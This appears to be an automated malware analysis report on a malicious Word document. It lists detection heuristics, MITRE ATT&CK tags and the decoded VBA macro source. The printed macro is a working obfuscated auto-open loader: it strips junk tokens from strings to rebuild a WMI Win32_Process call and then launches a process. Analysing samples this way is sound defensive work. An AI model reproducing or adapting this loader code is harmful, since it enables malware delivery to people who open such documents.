Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing an obfuscated VBA macro. The macro utilizes CreateObject and execution tokens, indicative of a loader designed to download and execute a second-stage payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature.
Heuristics (8)
- ClamAV: Doc.Malware.Generic-7178224-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9912 bytes |

SHA-256: 789f92747ade950b7c314ec40d8d8c4967fe61c47da3e6275c50d36fb51395db

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"
Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap As String
Private J5hw3qk As Boolean
Private Pjiv7b As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function
Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl As String
Private C2ijjt As Boolean
Private Ypdfc9tz As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
' Processing file: /opt/analyzer/scan_staging/f3d1d3695d394818bb6ff7a4491cfae7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes
... (truncated)